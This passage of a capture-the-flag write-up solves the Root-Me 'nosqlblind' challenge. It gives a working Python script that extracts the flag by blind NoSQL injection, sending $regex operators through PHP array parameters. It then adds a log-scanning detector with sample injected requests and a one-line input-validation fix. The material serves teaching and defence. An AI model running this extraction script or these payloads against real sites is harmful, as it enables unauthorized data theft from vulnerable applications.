Once the injection point is secured, the data and its length can be extracted through regex queries ($regex) against the flag field, one character at a time.
Payload
```python
import re
import string

import requests
import urllib3

urllib3.disable_warnings()

URL = "http://challenge01.root-me.org/web-serveur/ch48/index.php"
RETURN_TEXT = "Yeah this is the flag for nosqlblind!"


def matches(pattern):
    """True when the page confirms a match for the anchored regex ^<pattern>."""
    # requests URL-encodes the key and value, so $ [ ] ^ { } and & reach PHP intact
    params = {"chall_name": "nosqlblind", "flag[$regex]": "^" + pattern}
    r = requests.get(URL, params=params, verify=False)
    return RETURN_TEXT in r.text


# Step 1: data length. ^.{i} keeps matching while the flag has at least i characters,
# so the first i that fails gives length i-1.
data_len = 0
for i in range(1, 100):
    if not matches(".{%d}" % i):
        data_len = i - 1
        print("Length of Data : %d" % data_len)
        break

# Step 2: recover one character per position by extending the known prefix.
password = ""
for _ in range(data_len):
    for c in string.printable:
        if c.isspace():
            continue
        # re.escape lets regex metacharacters (. * + ? | etc.) be tested literally
        if matches(re.escape(password + c)):
            password += c
            print("Found one more char : %s" % password)
            break

print("Flag: " + password)
```
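From the defender's side, the same technique leaves a distinctive trace: query-string keys of the form `param[$operator]` and a run of `$regex` probes against one parameter. The following detector is an added example, not part of the original post; it scans constructed access-log lines (sample data, not real traffic) and reports every request that smuggles a MongoDB operator through a PHP array parameter.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# PHP turns ?flag[$regex]=x into $_GET['flag']['$regex']; no legitimate client
# sends a $-prefixed key, so any such key is a finding.
OPERATOR_KEY = re.compile(r"^(?P<param>[A-Za-z0-9_]+)\[(?P<op>\$[A-Za-z]+)\]$")
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (?P<target>\S+) HTTP/')

# Constructed sample log (combined log format); hosts and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:10:00:01 +0900] "GET /index.php?chall_name=nosqlblind&flag=abc HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2022:10:00:02 +0900] "GET /index.php?chall_name=nosqlblind&flag%5B%24regex%5D=%5E.%7B3%7D HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2022:10:00:03 +0900] "GET /index.php?chall_name=nosqlblind&flag[$regex]=^.{4} HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2022:10:00:04 +0900] "GET /login.php?user=admin&pass[$ne]=1 HTTP/1.1" 302 0
"""


def operator_keys(query):
    """Yield (param, operator, value) for each query pair whose key carries a $operator."""
    # parse_qsl percent-decodes keys, so flag%5B%24regex%5D and flag[$regex] look alike
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = OPERATOR_KEY.match(key)
        if m:
            yield m.group("param"), m.group("op"), value


def scan_access_log(text):
    """Return one finding per request whose query string carries a MongoDB operator key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, op, value in operator_keys(query):
            findings.append({"line": lineno, "param": param, "op": op, "value": value})
    return findings


def count_regex_probes(findings, param):
    """Number of $regex probes against one parameter; a long run is the blind-extraction signature."""
    return sum(1 for f in findings if f["param"] == param and f["op"] == "$regex")


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("line %(line)d: %(param)s[%(op)s] = %(value)r" % f)
```

The fix on the application side is to reject non-string values before they reach the query (in PHP, `is_string($_GET['flag'])`), which turns every one of these probes into a plain 4xx instead of a query-operator evaluation.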